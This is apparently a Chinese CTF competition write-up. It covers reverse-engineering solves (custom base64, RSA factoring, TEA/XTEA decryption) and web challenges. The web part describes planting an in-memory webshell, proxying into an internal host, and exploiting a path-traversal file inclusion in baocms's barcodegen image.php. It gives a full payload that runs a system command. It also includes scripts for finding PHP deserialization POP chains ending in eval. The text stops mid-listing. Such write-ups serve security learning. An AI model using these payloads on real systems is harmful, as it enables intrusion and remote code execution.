    import struct
    cipher = [0x3EC81D9432CEF584, 0xB649A4DCD6BD24FE, 0xC5927F0B767A787D, 0x1F245B7F751BB52E]
    xor_data = [0x178DEC4F232DDB6E, 0xC2AAB7D6D2A167C3, 0xF1AB91F72761A80F, 0x3DCEDC28076C41A]
    rand_num = 0x6e191
    xor_data2 = [165,220,121,181,173,29,65,7,237,84,204,183,178,23,228,173,33,228,94,150,235,53,196,224,80,127,120,95,136,104,38,98]

    for i in range(4):
    cipher[i] ^= xor_data[i]

    cipher = struct.pack("<4Q", cipher[0], cipher[1], cipher[2], cipher[3])
    cipher = struct.unpack("<8L", cipher)
    cipher = list(cipher)
    for i in range(len(cipher)):
    cipher[i] -= rand_num
    print(cipher)

    cipher = [0xd218b0c3,0x65366cd6,0x85fc66b2,0xc1944883,0xe1019d40,0xbfac4182,0x3c111125,0x1f481ae7]
    cipher = struct.pack("<8L", cipher[0], cipher[1], cipher[2], cipher[3], cipher[4], cipher[5], cipher[6], cipher[7])
    cipher = list(struct.unpack("<32B", cipher))
    for i in range(32):
    c = cipher[i]^xor_data2[i]
    print(chr(c), end="")

StandOnTheGaints

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
int __fastcall Java_com_a_standonthegiants_MainActivity_check(int a1, int a2, int a3)
{
int ptr; // r6
const char *input; // r8
size_t len; // r4
int v7; // r2
_BYTE *input__; // r10
int input_; // r5
_QWORD *ctx; // r11
int i; // r0
int v12; // r0
int *num_3; // r5
int len_; // r0
unsigned __int8 *v15; // r4
int len_1; // r10
unsigned __int8 *out; // r5
int v18; // r4
int v21; // [sp+10h] [bp-110h] BYREF
int v22; // [sp+14h] [bp-10Ch]
_DWORD *num_2; // [sp+1Ch] [bp-104h] BYREF
_DWORD *num_1; // [sp+20h] [bp-100h] BYREF
_DWORD *input_0; // [sp+24h] [bp-FCh] BYREF
char v26[216]; // [sp+28h] [bp-F8h] BYREF

ptr = 0;
input = (const char *)(*(int (__fastcall **)(int, int, _DWORD))(*(_DWORD *)a1 + 676))(a1, a3, 0);
len = strlen(input);
input__ = malloc(2 * len + 4);
input_ = (int)input__;
while ( len != ptr )
{
sub_52318(input_, -1, v7, (unsigned __int8)input[ptr]);// unhex
input_ += 2;
++ptr;
}
ctx = BN_CTX_new_ex();
sub_5249C((int)ctx);
input_0 = BN_POOL_get(ctx);
trans(&input_0, input__); // get input_0
free(input__);
num_1 = BN_POOL_get(ctx);
num_2 = BN_POOL_get(ctx);
qmemcpy(v26, &unk_2C6B0, 0xD1u);
for ( i = 0; i != 209; ++i )
v26[i] ^= '=';
trans(&num_1, v26); // get num_1
memset(v26, 0, 0xD1u);
v12 = 0;
v21 = 0;
v22 = 0;
while ( v12 != 6 )
*((_BYTE *)&v21 + v12++) ^= '0';
++BYTE1(v21);
++BYTE1(v22);
trans(&num_2, &v21); // get num_2
v21 = 0;
v22 = 0;
num_3 = BN_POOL_get(ctx);
BN_mod_exp((int)num_3, (int)input_0, (int)num_2, (int)num_1, (int)ctx);// num_3=input_0^num_2%num_1
len_ = sub_565A8(num_3);
v15 = (unsigned __int8 *)malloc((len_ + 7) / 8);
len_1 = BN_bn2bin((int)num_3, (int)v15);
sub_525B8(ctx);
sub_523E8(ctx);
out = (unsigned __int8 *)calloc(3u, len_1);
encode(v15, out, len_1, 0);
free(v15);
v18 = strcmp(
"bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG"
"+/lmqEysrTdSD+eP+moP+l?+Np/oK=",
(const char *)out);
free(out);
(*(void (__fastcall **)(int, int, const char *))(*(_DWORD *)a1 + 680))(a1, a3, input);
return v18;
}

编译出来检查一下确实是 base64 变种

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#include <cstdio>

char st[]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-";

unsigned int __fastcall div(unsigned int a1, unsigned int a2){
return a1/a2;
}

int __fastcall encode(unsigned __int8 *in, unsigned __int8 *out, unsigned int len, int a4)
{
unsigned int v8; // r0
int v9; // r9
unsigned int v10; // r6
int v11; // r8
int v12; // r4
unsigned __int8 *v13; // r2
int v14; // r1
unsigned __int8 *v15; // r1
unsigned __int8 v16; // r0
unsigned __int8 *v17; // r2
unsigned __int8 v18; // r0
unsigned int v20; // [sp+0h] [bp-28h]
int v21; // [sp+4h] [bp-24h]
unsigned int v22; // [sp+8h] [bp-20h]

v8 = div(len, 3u);
v22 = 3 * v8;
if ( out )
{
v20 = len - 3 * v8;
v21 = a4;
v9 = 0;
v10 = 0;
v11 = 0;
while ( v10 < v22 )
{
printf("(%d/%d)",v10,v22);
v12 = v9 + 4;
out[v9] = st[in[v10] >> 2];
v13 = &out[v9];
v13[1] = st[(in[v10 + 1] >> 4) & 0xFFFFFFCF | (16 * (in[v10] & 3))];
v13[2] = st[(in[v10 + 2] >> 6) & 0xFFFFFFC3 | (4 * (in[v10 + 1] & 0xF))];
v13[3] = st[in[v10 + 2] & 0x3F];
if ( !v21 || div(v9 + 4 - v11, 76))
{
v9 += 4;
}
else
{
v9 += 5;
++v11;
out[v12] = 10;
}
v10 += 3;
}
if ( v20 == 2 )
{
out[v9] = st[in[v10] >> 2];
v17 = &out[v9];
v17[1] = st[(in[v10 + 1] >> 4) & 0xFFFFFFCF | (16 * (in[v10] & 3))];
v18 = in[v10 + 1];
v17[3] = 61;
v17[2] = st[4 * (v18 & 0xF)];
goto LABEL_17;
}
if ( v20 == 1 )
{
v15 = &out[v9];
out[v9] = st[in[v10] >> 2];
v16 = in[v10];
v15[2] = 0x3D;
v15[3] = 0x3D;
v15[1] = st[16 * (v16 & 3)];
LABEL_17:
v9 += 4;
return v9;
}
}
else
{
v9 = 4 * v8 + 4;
if ( len == 3 * v8 )
v9 = 4 * v8;
if ( a4 )
v9 += div(len, 57u);
}
return v9;
}
unsigned char in[]={4,19,145,162,221,78,30,13,54,187,174,253,228,107,226,107,61,246,79,93,101,3,50,168,68,175,46,10,202,36,143,195,247,143,85,84,178,127,58,19,105,2,231,193,247,58,31,58,77,49,206,67,44,172,164,253,243,115,92,150,235,66,81,94,150,12,131,42,57,165,87,104,136,133,103,201,53,99,242,98,52,130,13,121,44,196,30,97,36,109,14,199,117,18,157,76,58,157,75,243,89,207,228,233};
char out[100];
int main(){
int t=encode((unsigned char*)in,(unsigned char*)out,150,0);
printf("%d\\n",t);
printf("%s",out);
}

base64变种解密

1
2
3
4
5
6
7
8
9
10
11
12
import base64
import binascii

a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-="
b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
s="bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="
c=""
for i in s:
c=c+b[a.find(i)]
print(c)
q=base64.b64decode(c)
print(binascii.hexlify(q))

RSA分解解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#include <cstdio>
#include <openssl/bn.h>
#include <openssl/crypto.h>

unsigned char s1[] =
{
0x0C, 0x0E, 0x0F, 0x0C, 0x79, 0x0F, 0x7B, 0x79, 0x79, 0x79,
0x78, 0x05, 0x7F, 0x79, 0x04, 0x79, 0x7B, 0x7B, 0x0E, 0x0A,
0x04, 0x7C, 0x7B, 0x7B, 0x0D, 0x0E, 0x0D, 0x79, 0x78, 0x0F,
0x0D, 0x08, 0x7F, 0x05, 0x09, 0x0B, 0x78, 0x7F, 0x08, 0x7E,
0x78, 0x7E, 0x7E, 0x09, 0x0D, 0x7B, 0x7C, 0x05, 0x7C, 0x7C,
0x04, 0x7E, 0x0F, 0x7C, 0x05, 0x08, 0x7E, 0x78, 0x0E, 0x78,
0x04, 0x04, 0x0F, 0x0C, 0x04, 0x0E, 0x78, 0x05, 0x0A, 0x0E,
0x7F, 0x0F, 0x7F, 0x7E, 0x0B, 0x0B, 0x0A, 0x79, 0x7C, 0x7F,
0x78, 0x0F, 0x7C, 0x7E, 0x0E, 0x78, 0x78, 0x04, 0x79, 0x79,
0x0F, 0x0E, 0x7F, 0x0E, 0x7C, 0x04, 0x78, 0x79, 0x04, 0x78,
0x7E, 0x0D, 0x7E, 0x0E, 0x7E, 0x0A, 0x09, 0x09, 0x08, 0x0B,
0x0B, 0x0E, 0x7B, 0x08, 0x09, 0x08, 0x08, 0x09, 0x0B, 0x04,
0x7F, 0x0A, 0x0F, 0x0A, 0x79, 0x79, 0x0B, 0x7B, 0x7F, 0x7E,
0x0D, 0x0E, 0x7F, 0x0C, 0x7F, 0x7B, 0x04, 0x08, 0x79, 0x0D,
0x0E, 0x7C, 0x0C, 0x0E, 0x7E, 0x0D, 0x0E, 0x0B, 0x05, 0x0B,
0x09, 0x08, 0x0A, 0x0B, 0x0A, 0x0B, 0x0E, 0x0D, 0x7E, 0x0A,
0x78, 0x7C, 0x7F, 0x7B, 0x08, 0x78, 0x0A, 0x7C, 0x7F, 0x08,
0x7B, 0x7C, 0x0F, 0x0A, 0x7F, 0x04, 0x09, 0x7C, 0x79, 0x78,
0x0A, 0x78, 0x0C, 0x78, 0x0F, 0x0E, 0x7F, 0x7E, 0x7E, 0x0B,
0x08, 0x79, 0x0F, 0x7C, 0x0A, 0x79, 0x78, 0x79, 0x0C, 0x7E,
0x08, 0x7F, 0x0E, 0x0B, 0x09, 0x7F, 0x08, 0x0C, 0x3D,
};

int main(){
BIGNUM *c = BN_new();
BN_hex2bn(&c,"041391a2dd4e1e0d36bbaefde46be26b3df64f5d650332a844af2e0aca248fc3f78f5554b27f3a136902e7c1f73a1f3a4d31ce432caca4fdf3735c96eb42515e960c832a39a55768888567c93563f26234820d792cc41e61246d0ec775129d4c3a9d4bf359cfe4e9");

for (int i=0;i<0xD1;i++) s1[i]^=0x3D;
BIGNUM *n = BN_new();
printf("s1:%s\\n",s1);
BN_hex2bn(&n,(const char*)s1);

char s2[]="010001";
BIGNUM *e = BN_new();
BN_hex2bn(&e,(const char*)s2);

//c=m^e%n
printf("c:%s\\n",BN_bn2dec(c));
printf("n:%s\\n",BN_bn2dec(n));
printf("e:%s\\n",BN_bn2dec(e));

BIGNUM *p_1 = BN_new();
BIGNUM *q_1 = BN_new();
BN_dec2bn(&p_1,"33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062710");
BN_dec2bn(&q_1,"64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853366");
//p=33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711
//q=64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367
printf("p:%s\\n",BN_bn2dec(p_1));
printf("q:%s\\n",BN_bn2dec(q_1));

BIGNUM *d = BN_new();
BIGNUM *phi = BN_new();
BN_CTX *bn_ctx = BN_CTX_new();
BN_mul(phi,p_1,q_1,bn_ctx);
BN_mod_inverse(d,e,phi,bn_ctx);
printf("phi:%s\\n",BN_bn2dec(phi));
printf("d:%s\\n",BN_bn2dec(d));

BIGNUM *m = BN_new();
BN_mod_exp(m,c,d,n,bn_ctx);

printf("c:%s\\n",BN_bn2hex(c));
printf("m:%s\\n",BN_bn2hex(m));
}
m:092C636F75222F948E6C6D30F6B8CD61E8896860CEE9A590873B503588892FCB5C2B53228DC5FE4A8D198D4F4077358097B738A6927211296967A45E2F68DF863967D0A6DFC06D2ABB878C1856E9E984CFC78270F8CF6438E17ADCD9823780B860B1835C585CADBE
c:041391A2DD4E1E0D36BBAEFDE46BE26B3DF64F5D650332A844AF2E0ACA248FC3F78F5554B27F3A136902E7C1F73A1F3A4D31CE432CACA4FDF3735C96EB42515E960C832A39A55768888567C93563F26234820D792CC41E61246D0EC775129D4C3A9D4BF359CFE4E9
f:bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK=

上调试机动态调了好多次,算法肯定没问题

直接patch传入明文m进去加密一路right

可能是有反调试?或者脑洞?

1
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-

常量表里+-出现了两次,还要枚举一层

解题脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import base64
import binascii

#a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-="
a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]$#="
b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
s="bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="

n=2140324650240744961264423072839333563008614715144755017797754920881418023447140136643345519095804679610992851872470914587687396261921557363047454770520805119056493106687691590019759405693457452230589325976697471681738069364894699871578494975937497937
d=1219002363472329316632678572665837077877528004905520939230037996503041169769564562618818603930146413036298872224725717654149810234132887053185714832075764978825457518728410705223332728199047961645304133836997233492855592278022423674340390891560261753
e=65537

def test(c):
c=c.translate(str.maketrans(a,b))
c=base64.b64decode(c)
c=int.from_bytes(c,byteorder='big',signed=False)
m=pow(c,d,n)
mx=hex(m)
if (len(mx)<200):
print(mx)
m=m.to_bytes(length=0x68,byteorder='big',signed=False)
print(m)
input()

l=[]
for index,i in enumerate(s):
if i in '+-':
l.append(index)

p=list(s)
tr={"+":"$","-":"#"}

def enum(dep,ch):
if (ch):
p[l[dep]]=tr[s[l[dep]]]
else:
p[l[dep]]=s[l[dep]]
if (dep==0):
print(''.join(p))
test(''.join(p))
else:
enum(dep-1,0)
enum(dep-1,1)

enum(len(l)-1,0)
enum(len(l)-1,1)

LongTimeAgo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#include "stdio.h"
#include "stdint.h"

//0x8F3779E9
void xtea_decrypt(uint32_t v[2], uint32_t const key[4]) {
unsigned int i;
unsigned int num_rounds = 32;
uint32_t v0=v[0], v1=v[1], delta=0x8F3779E9, sum=delta*num_rounds;
for (i=0; i < num_rounds; i++) {
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
sum -= delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
}
v[0]=v0; v[1]=v1;
}

//0x3D3529BC
void tea_decrypt (uint32_t* v, uint32_t* k) {
uint32_t v0=v[0], v1=v[1], sum, i; /* set up */
uint32_t delta=0x3D3529BC; /* a key schedule constant */
sum = delta * 32;
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i<32; i++) { /* basic cycle start */
v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
sum -= delta;
} /* end cycle */
v[0]=v0; v[1]=v1;
}

unsigned int cher[8] = {
0x1F306772, 0xB75B0C29, 0x4A7CDBE3, 0x2877BDDF, 0x1354C485, 0x357C3C3A, 0x738AF06C, 0x89B7F537
};
unsigned int key[4] = {
0xFFFD, 0x1FFFD, 0x3FFFD, 0x7FFFD
};

int main(){
unsigned v[2];

v[0] = cipher[0] ^ 0xfd;
v[1] = cipher[1] ^ 0x1fd;
xtea_decrypt(v, key);
printf("%08x%08x", v[0], v[1]);

v[0] = cipher[2] ^ 0xfd;
v[1] = cipher[3] ^ 0x1fd;
xtea_decrypt(v, key);
printf("%08x%08x", v[0], v[1]);

v[0] = cipher[4] ^ 0x3fd;
v[1] = cipher[5] ^ 0x7fd;
tea_decrypt(v, key);
printf("%08x%08x", v[0], v[1]);

v[0] = cipher[6] ^ 0x3fd;
v[1] = cipher[7] ^ 0x7fd;
tea_decrypt(v, key);
printf("%08x%08x", v[0], v[1]);
}

Web

Hard_Penetration

用🐲👴的工具https://github.com/ccdr4gon/Dr4gonSword

真的很牛 直接注入内存🐎

连接到shell 扫内网端口 有8005

image.png

frp挂上代理访问是baocms

代码https://github.com/IsCrazyCat/demo-baocms-v17.1

漫长的代码审计后

在Tudou/Lib/barcodegen/html/image.php处找到文件包含漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
if(isset($_GET['code'], $_GET['t'], $_GET['r'], $_GET['rot'], $_GET['text'], $_GET['f1'], $_GET['f2'], $_GET['o'], $_GET['dpi'], $_GET['a1'], $_GET['a2'])) {
require('config.php');
require($class_dir . '/BCGColor.php');
require($class_dir . '/BCGBarcode.php');
require($class_dir . '/BCGDrawing.php');
require($class_dir . '/BCGFont.php');
if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {
if($_GET['f1'] !== '0' && $_GET['f1'] !== '-1' && intval($_GET['f2']) >= 1) {
$font = new BCGFont($class_dir . '/font/' . $_GET['f1'], intval($_GET['f2']));
} else {
$font = 0;
}
$color_black = new BCGColor(0, 0, 0);
$color_white = new BCGColor(255, 255, 255);
$codebar = 'BCG' . $_GET['code'];
$code_generated = new $codebar();
if(isset($_GET['a1']) && intval($_GET['a1']) === 1) {
$code_generated->setChecksum(true);
}
.......

利用:

由于.barcode.php文件名被写死了,但是code是可控的,所以可以构造成../../../../../../tmp/.barcode.php进行目录穿越包含.barcode.php文件,在/tmp目录下创建.barcode.php文件写入一句话🐎

然后构造利用即可

image.png

payload:

1
2
127.0.0.1:8005/Tudou/Lib/barcodegen/html/image.php?code=/../../.
./../../../../../../../tmp/&t=1&r=1&rot=1&text=1&f1=1&f2=1&o=1&dpi=1&a1=1&a2=1&neo=system('cat /flag');

pop_master

一万个类找 POP 链

解析 AST 找到可以用的类(即输入不会被完全替换)

https://github.com/nikic/PHP-Parser

ast.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
<?php
use PhpParser\\ParserFactory;
use PhpParser\\Node;
use PhpParser\\NodeVisitorAbstract;
use PhpParser\\NodeTraverser;

require './vendor/autoload.php';

$code = file_get_contents('./class.php');

$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);

try {
$ast = $parser->parse($code);
} catch (Error $error) {
echo "Parse error: {$error->getMessage()}\\n";
return;
}

function filter(Node\\Stmt $stmt, Node\\Stmt\\ClassMethod $method): bool {
if ($stmt instanceof Node\\Stmt\\Expression &&
$stmt->expr instanceof Node\\Expr\\Assign &&
$stmt->expr->var instanceof Node\\Expr\\Variable &&
$stmt->expr->var->name == $method->params[0]->var->name) {
return false;
} else if ($stmt instanceof Node\\Stmt\\For_ &&
$stmt->stmts[0] instanceof Node\\Stmt\\Expression &&
$stmt->stmts[0]->expr instanceof Node\\Expr\\Assign &&
$stmt->stmts[0]->expr->var instanceof Node\\Expr\\Variable &&
$stmt->stmts[0]->expr->var->name == $method->params[0]->var->name) {
return false;
} else {
return true;
}
}

$classes = array();
$methods = array();
$calleds = array();
$available = array();

$traverser = new NodeTraverser();
$traverser->addVisitor(new class extends NodeVisitorAbstract {
public function enterNode(Node $node) {
global $classes, $methods, $calleds, $available;
if ($node instanceof Node\\Stmt\\Class_) {
foreach ($node->getMethods() as $method) {
foreach ($method->stmts as $key => $stmt) {
if ($stmt instanceof Node\\Stmt\\Expression) {
if ($stmt->expr instanceof Node\\Expr\\MethodCall) {
array_push($classes, $node->name->toString());
array_push($methods, $method->name->toString());
array_push($calleds, $stmt->expr->name->toString());
if ($key > 0) {
array_push($available, filter($method->stmts[$key - 1], $method));
} else {
array_push($available, true);
}
} else if ($stmt->expr instanceof Node\\Expr\\Eval_) {
array_push($classes, $node->name->toString());
array_push($methods, $method->name->toString());
array_push($calleds, 'eval');
if ($key > 0) {
array_push($available, filter($method->stmts[$key - 1], $method));
} else {
array_push($available, true);
}
}
} else if ($stmt instanceof Node\\Stmt\\If_) {
if ($stmt->stmts[0] instanceof Node\\Stmt\\Expression && $stmt->stmts[0]->expr instanceof Node\\Expr\\MethodCall) {
array_push($classes, $node->name->toString());
array_push($methods, $method->name->toString());
array_push($calleds, $stmt->stmts[0]->expr->name->toString());
if ($key == 1) {
array_push($available, filter($method->stmts[$key - 1], $method));
} else if ($key == 2) {
array_push($available, filter($method->stmts[$key - 2], $method));
} else {
array_push($available, true);
}
}
}
}
}
}
}
});
$ast = $traverser->traverse($ast);

构造二叉树找可用链

find.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<?php
require 'ast.php';

class FindNode {
public string $class;
public string $method;
public bool $available;

public FindNode $left;
public FindNode $right;
public ?FindNode $parent = null;

public function __construct(string $class, string $method, bool $available) {
$this->class = $class;
$this->method = $method;
$this->available = $available;
}
}

$eval = array();

function find(FindNode $node) {
global $eval;
global $classes, $methods, $calleds, $available;

if ($node->available) {
$keys = array_keys($methods, $node->method);
$called = $calleds[$keys[0]];
if ($called == 'eval') {
if ($available[$keys[0]]) {
array_push($eval, $node);
}
} else {
$called_key = array_search($called, $methods);
$node->left = new FindNode($classes[$called_key], $called, $available[$called_key]);
$node->left->parent = $node;
find($node->left);
}

if (count($keys) == 2) {
$called = $calleds[$keys[1]];
if ($called == 'eval') {
if ($available[$keys[1]]) {
array_push($eval, $node);
}
} else {
$called_key = array_search($called, $methods);
$node->right = new FindNode($classes[$called_key], $called, $available[$called_key]);
$node->right->parent = $node;
find($node->right);
}
}
}
}

global $classes, $methods;
$root = new FindNode('', 'BSatHY', true);
$root_key = array_search($root->method, $methods);
$root->class = $classes[$root_key];
find($root);

$last = $eval[0];
$success_classes = array();
$success_methods = array();

while ($last) {
array_push($success_classes, $last->class);
array_push($success_methods, $last->method);
$last = $last->parent;
}

$success_classes = array_reverse($success_classes);
$success_methods = array_reverse($success_methods);

再把链上的类导出来手写序列化

pop.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
require 'find.php';

use PhpParser\\ParserFactory;
use PhpParser\\Node;
use PhpParser\\NodeFinder;
use PhpParser\\PrettyPrinter;

require './vendor/autoload.php';

$code = file_get_contents('./class.php');

$parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);

try {
$ast = $parser->parse($code);
} catch (Error $error) {
echo "Parse error: {$error->getMessage()}\\n";
return;
}

$nodeFinder = new NodeFinder();
$result = array();

global $success_classes, $success_methods;
foreach ($success_classes as $key => $name) {
echo $name . " " . $success_methods[$key] . "\\n";
$class = $nodeFinder->findFirst($ast, function(Node $node) use ($name) {
return $node instanceof Node\\Stmt\\Class_
&& $node->name->toString() === $name;
});
if ($class && $class instanceof Node\\Stmt\\Class_) {
foreach ($class->stmts as $stmt_key => $stmt) {
if ($stmt instanceof Node\\Stmt\\ClassMethod && !in_array($stmt->name->toString(), $success_methods)) {
array_splice($class->stmts, $stmt_key, 1);
}
}
array_push($result, $class);
}
}

$prettyPrinter = new PrettyPrinter\\Standard;
file_put_contents("test.php", $prettyPrinter->prettyPrintFile($result) . "\\n");

test.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
<?php

class HdeuDP
{
public $ErltTLc;
public function BSatHY($kECoG)
{
$this->qSvVG = "EOqvO";
if (method_exists($this->ErltTLc, 'GGWZSI')) {
$this->ErltTLc->GGWZSI($kECoG);
}
if (method_exists($this->ErltTLc, 'mymqzK')) {
$this->ErltTLc->mymqzK($kECoG);
}
}
}
class vwR9vW
{
public $sQ9iP8M;
public function GGWZSI($sxXmz)
{
for ($i = 0; $i < 24; $i++) {
$aMHmsA = $sxXmz;
}
if (method_exists($this->sQ9iP8M, 'Ez1w4x')) {
$this->sQ9iP8M->Ez1w4x($sxXmz);
}
if (method_exists($this->sQ9iP8M, 'XstiKs')) {
$this->sQ9iP8M->XstiKs($sxXmz);
}
}
}
class sg2RxY
{
public $qsDrtNG;
public function Ez1w4x($BoGtf)
{
if (11792 > 19530) {
$BoGtf = $BoGtf . 'WznaW';
}
$this->qsDrtNG->xOBpW0($BoGtf);
}
}
class M4LuGl
{
public $VGhzS66;
public function xOBpW0($mcFiQ)
{
$this->BO10G = "NU4C7";
if (method_exists($this->VGhzS66, 'yTEURN')) {
$this->VGhzS66->yTEURN($mcFiQ);
}
if (method_exists($this->VGhzS66, 'cniDX8')) {
$this->VGhzS66->cniDX8($mcFiQ);
}
}
}
class rHZfcN
{
public $tgW2UXg;
public function yTEURN($WSoPF)
{
$this->YXdVB = "MVTKA";
if (method_exists($this->tgW2UXg, 'y02y08')) {
$this->tgW2UXg->y02y08($WSoPF);
}
if (method_exists($this->tgW2UXg, 'qVbCki')) {
$this->tgW2UXg->qVbCki($WSoPF);
}
}
}
class gxx6av
{
public $c1WX5it;
public function y02y08($fX0aQ)
{
$this->eK6np = "kN0IB";
$this->c1WX5it->r6LtQG($fX0aQ);
}
}
class L0UPus
{
public $qZfI0OC;
public function r6LtQG($BFESf)
{
$this->rg5UW = "zos3T";
if (method_exists($this->qZfI0OC, 'QF8XY1')) {
$this->qZfI0OC->QF8XY1($BFESf);
}
if (method_exists($this->qZfI0OC, 'LuSdbh')) {
$this->qZfI0OC->LuSdbh($BFESf);
}
}
}
class K7VNu5
{
public $lB9b5G5;
public function QF8XY1($AGE10)
{
for ($i = 0; $i < 9; $i++) {
$ayzdYg = $AGE10;
}
if (method_exists($this->lB9b5G5, 'zD7lbq')) {
$this->lB9b5G5->zD7lbq($AGE10);
}
if (method_exists($this->lB9b5G5, 'IpkWxX')) {
$this->lB9b5G5->IpkWxX($AGE10);
}
}
}
class T5mH7X
{
public $xCsxdh5;
public function IpkWxX($PEvGe)
{
$this->voWr3 = "Nz8vn";
if (method_exists($this->xCsxdh5, 'EKr4ag')) {
$this->xCsxdh5->EKr4ag($PEvGe);
}
if (method_exists($this->xCsxdh5, 't4SIVr')) {
$this->xCsxdh5->t4SIVr($PEvGe);
}
}
}
class lwmggy
{
public $FigpmfG;
public function EKr4ag($gKFKp)
{
$this->Tiwg9 = "IRavG";
$this->FigpmfG->lhtmWT($gKFKp);
}
}
class X1Bmbb
{
public $u0ma7My;
public function lhtmWT($ezg5D)
{
for ($i = 0; $i < 16; $i++) {
$aQI2GP = $ezg5D;
}
